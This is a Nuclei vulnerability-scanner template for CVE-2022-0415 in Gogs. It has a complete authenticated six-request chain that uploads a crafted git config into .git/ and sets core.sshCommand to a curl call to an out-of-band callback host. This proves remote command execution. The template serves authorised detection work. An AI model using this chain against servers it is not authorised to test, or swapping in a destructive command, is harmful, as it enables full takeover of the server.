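id: CVE-2022-0415

info:
  name: Gogs <0.12.6 - Remote Command Execution
  author: theamanrawat
  severity: high
  # NOTE: the NVD wording "without entering necessary credentials" is misleading for
  # this template: the request chain below logs in with {{username}}/{{password}}
  # (tag "authenticated", CVSS PR:L). A valid Gogs account is a precondition.
  description: |
    Gogs before 0.12.6 is susceptible to remote command execution via the uploading repository file in GitHub repository gogs/gogs. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
  impact: |
    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system.
  remediation: Fixed in version 0.12.6.
  reference:
    - https://github.com/gogs/gogs/commit/0fef3c9082269e9a4e817274942a5d7c50617284
    - https://huntr.dev/bounties/b4928cfe-4110-462f-a180-6d5673797902
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0415
    - https://github.com/bfengj/CTF
    - https://github.com/cokeBeer/go-cves
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2022-0415
    cwe-id: CWE-434,CWE-20
    epss-score: 0.11758
    epss-percentile: 0.95304
    cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 6
    vendor: gogs
    product: gogs
    shodan-query:
      - cpe:"cpe:2.3:a:gogs:gogs"
      - http.title:"sign in - gogs"
    fofa-query: title="sign in - gogs"
    google-query: intitle:"sign in - gogs"
  # "intrusive": this template creates a new repository on the target and
  # overwrites that repository's .git/config. Neither artifact is cleaned up;
  # remove the {{randstr}} repository manually after a confirmed hit.
  tags: cve,cve2022,rce,gogs,authenticated,huntr,intrusive

# Exploit chain (6 requests, all require a valid account):
#   1. GET  /user/login           -> extract form CSRF token (csrf)
#   2. POST /user/login           -> authenticate with {{username}}/{{password}}
#   3. GET  /repo/create          -> extract session CSRF token from <meta> (auth_csrf)
#   4. POST /repo/create          -> create a throwaway repo named {{randstr}}
#   5. POST .../upload-file       -> stage a file literally named "config" (returns uuid)
#   6. POST .../_upload/master/   -> commit the staged file with tree_path=/.git/,
#                                    i.e. overwrite the repository's own .git/config
# The planted config sets core.sshCommand to an outbound curl; the CVE is that
# git executes this value (as the Gogs service user) the next time it talks to
# the ssh remote, so an OOB hit on {{interactsh-url}} confirms command execution.
http:
  - raw:
      - |
        GET /user/login HTTP/1.1
        Host: {{Hostname}}

      # Both form fields are URL-encoded: Gogs accepts an e-mail address as
      # user_name, and characters such as '+' or '@' would otherwise be
      # misparsed by the form decoder.
      - |
        POST /user/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _csrf={{csrf}}&user_name={{url_encode(username)}}&password={{url_encode(password)}}

      - |
        GET /repo/create HTTP/1.1
        Host: {{Hostname}}

      # user_id=1 is hard-coded: the repository is created under uid 1, which is
      # only valid when the supplied credentials belong to that user (typically
      # the first/admin account). With another account this step is expected to
      # fail and the remaining requests will 404 -- adjust user_id accordingly.
      - |
        POST /repo/create HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _csrf={{auth_csrf}}&user_id=1&repo_name={{randstr}}&description=test&gitignores=&license=&readme=Default&auto_init=on

      # The uploaded "config" is a complete git config so the repository keeps
      # working after it is overwritten; the only hostile key is sshCommand.
      # The payload is a benign HEAD request (curl -I) -- replace only with an
      # equally non-destructive probe.
      - |
        POST /{{username}}/{{randstr}}/upload-file HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json
        X-Requested-With: XMLHttpRequest
        X-Csrf-Token: {{auth_csrf}}
        Content-Type: multipart/form-data; boundary=---------------------------313811965223810628771946318395

        -----------------------------313811965223810628771946318395
        Content-Disposition: form-data; name="file"; filename="config"
        Content-Type: application/octet-stream

        [core]
          repositoryformatversion = 0
          filemode = true
          bare = false
          logallrefupdates = true
          ignorecase = true
          precomposeunicode = true
          sshCommand = curl http://{{interactsh-url}} -I
        [remote "origin"]
          url = git@github.com:torvalds/linux.git
          fetch = +refs/heads/*:refs/remotes/origin/*
        [branch "master"]
          remote = origin
          merge = refs/heads/master
        -----------------------------313811965223810628771946318395--

      # tree_path=/.git/ is the actual bug: the commit path is not confined to
      # the work tree, so the staged file lands at .git/config.
      - |
        POST /{{username}}/{{randstr}}/_upload/master/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _csrf={{auth_csrf}}&tree_path=/.git/&files={{uuid}}&commit_summary=&commit_message=&commit_choice=direct&new_branch_name=

    matchers-condition: and
    matchers:
      # OOB callback is the only evidence of execution; a DNS-only hit still
      # counts because egress HTTP may be filtered.
      - type: word
        part: interactsh_protocol
        words:
          - dns
          - http

      # Sanity check that the first response really came from Gogs.
      - type: word
        part: body_1
        words:
          - content="Gogs

    extractors:
      # Captures use [^"]+ rather than a greedy .* so a token is never
      # contaminated by trailing attributes or JSON fields on the same line.
      - type: regex
        name: csrf
        group: 1
        regex:
          - name="_csrf" value="([^"]+)"
        internal: true

      - type: regex
        name: auth_csrf
        group: 1
        regex:
          - name="_csrf" content="([^"]+)"
        internal: true

      - type: regex
        name: uuid
        group: 1
        regex:
          - ' "uuid": "([^"]+)"'
        internal: true

# Upstream template signature. It covers the original body, so it will no
# longer verify once this file is edited; re-sign or expect an unsigned-template
# warning from nuclei.
# digest: 4a0a0047304502200d8ef6d64f56736b9f4df649e0b8a901e1a6c156d7d926865321279d635f17e4022100e580aba4cadd6840a8ca15efa3aaf5afc09849320cafadf6eecbfa672db2cb58:922c64590222798bb761d5b6d8e72950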